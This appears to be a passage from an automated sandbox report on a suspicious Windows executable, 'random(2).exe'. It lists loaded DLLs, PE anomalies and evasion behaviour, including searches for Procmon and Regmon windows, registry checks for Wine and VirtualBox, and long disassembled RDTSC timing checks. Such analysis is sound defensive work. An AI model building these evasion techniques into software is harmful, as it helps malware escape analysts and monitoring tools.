Source: C:\Users\user\Desktop\random(2).exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: random(2).exe

Static file information: File size 1822720 > 1048576

Source: random(2).exe

Static PE information: Raw size of xyhrtgkn is bigger than: 0x100000 < 0x1aa400

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random(2).exe

Static PE information: real checksum: 0x1bd743 should be: 0x1be5cf

Source: random(2).exe	Static PE information: section name:
Source: random(2).exe	Static PE information: section name: .idata
Source: random(2).exe	Static PE information: section name:
Source: random(2).exe	Static PE information: section name: xyhrtgkn
Source: random(2).exe	Static PE information: section name: atwyfmcm
Source: random(2).exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_04931521 push eax; iretd	0_3_04931525
Source: C:\Users\user\Desktop\random(2).exe	Code function: 0_3_0493DFF7 push ecx; iretd	0_3_0493E074

Source: random(2).exe	Static PE information: section name: entropy: 7.97802160630939
Source: random(2).exe	Static PE information: section name: xyhrtgkn entropy: 7.955289387133198

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random(2).exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 42D0F5 second address: 42D110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 42C9C5 second address: 42C9CF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F294453553Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AB975 second address: 5AB98E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29453582D6h 0x00000008 jmp 00007F29453582DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AA9B1 second address: 5AA9B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAC86 second address: 5AAC8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAC8A second address: 5AACBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535544h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2944535540h 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAF57 second address: 5AAF5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAF5B second address: 5AAF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAF67 second address: 5AAF7B instructions: 0x00000000 rdtsc 0x00000002 je 00007F29453582D6h 0x00000008 jmp 00007F29453582DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAF7B second address: 5AAFA1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F294453553Ah 0x00000008 jmp 00007F294453553Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007F294453553Ah 0x00000016 push eax 0x00000017 pop eax 0x00000018 push edi 0x00000019 pop edi 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AAFA1 second address: 5AAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DBh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jmp 00007F29453582E2h 0x00000010 jmp 00007F29453582E4h 0x00000015 pop ecx 0x00000016 js 00007F29453582DCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD8F0 second address: 5AD8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2944535536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD8FA second address: 5AD909 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD909 second address: 5AD918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD918 second address: 5AD91E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD91E second address: 5AD922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD922 second address: 5AD932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD932 second address: 5AD93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2944535536h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD93F second address: 5AD994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F29453582E0h 0x0000000f push eax 0x00000010 jmp 00007F29453582E3h 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c js 00007F29453582ECh 0x00000022 jmp 00007F29453582E6h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD994 second address: 5AD998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5AD998 second address: 5AD99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB00 second address: 5ADB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB04 second address: 5ADB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB0A second address: 5ADB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB0F second address: 5ADB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d jp 00007F29453582DBh 0x00000013 push 00000000h 0x00000015 mov dx, si 0x00000018 push 867025AEh 0x0000001d pushad 0x0000001e jmp 00007F29453582E3h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB48 second address: 5ADB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADB4E second address: 5ADBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 798FDAD2h 0x0000000d or dword ptr [ebp+122D1964h], edx 0x00000013 jmp 00007F29453582E7h 0x00000018 push 00000003h 0x0000001a jc 00007F29453582DCh 0x00000020 xor esi, dword ptr [ebp+122D195Ch] 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D355Ah], eax 0x0000002e push 00000003h 0x00000030 mov edi, dword ptr [ebp+122D3892h] 0x00000036 push 970B4C30h 0x0000003b jo 00007F29453582E0h 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADC80 second address: 5ADC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADC84 second address: 5ADCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F29453582D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 xor edx, dword ptr [ebp+122D2116h] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d mov ecx, dword ptr [ebp+122D370Ah] 0x00000033 pop edi 0x00000034 call 00007F29453582D9h 0x00000039 jmp 00007F29453582E0h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jng 00007F29453582D8h 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADCE5 second address: 5ADD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push esi 0x00000010 jmp 00007F2944535548h 0x00000015 pop esi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADD16 second address: 5ADD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ADD1A second address: 5ADD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CE61E second address: 5CE62A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29453582D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CE7A0 second address: 5CE7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CE7A9 second address: 5CE7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CE931 second address: 5CE935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CEC0E second address: 5CEC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CEC12 second address: 5CEC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CEC16 second address: 5CEC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CEC22 second address: 5CEC27 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CED46 second address: 5CED4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CED4C second address: 5CED69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2944535545h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CED69 second address: 5CED8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 jng 00007F29453582D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F29453582D6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CED8E second address: 5CED92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF075 second address: 5CF079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF079 second address: 5CF0CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2944535546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2944535549h 0x00000017 jmp 00007F2944535541h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007F294453553Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF0CA second address: 5CF0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29453582D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF418 second address: 5CF43B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2944535536h 0x00000008 jmp 00007F2944535549h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF43B second address: 5CF448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007F29453582D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF59E second address: 5CF5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F294453553Ch 0x00000010 ja 00007F2944535536h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF5BE second address: 5CF5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F29453582D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5CF5CA second address: 5CF5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D026C second address: 5D02B9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F29453582F4h 0x00000012 jne 00007F29453582D6h 0x00000018 jmp 00007F29453582E8h 0x0000001d jno 00007F29453582EDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D3149 second address: 5D314D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D314D second address: 5D3159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D3159 second address: 5D3163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2944535536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D3163 second address: 5D3179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D3179 second address: 5D3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D489C second address: 5D48D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F29453582E7h 0x00000011 popad 0x00000012 jmp 00007F29453582E2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D48D2 second address: 5D48DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D48DA second address: 5D48E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D8289 second address: 5D828D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D828D second address: 5D82A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29453582E1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D82A6 second address: 5D82AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D71E5 second address: 5D71EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D9D11 second address: 5D9D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D9D17 second address: 5D9D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5D9D1B second address: 5D9D32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F294453553Ch 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
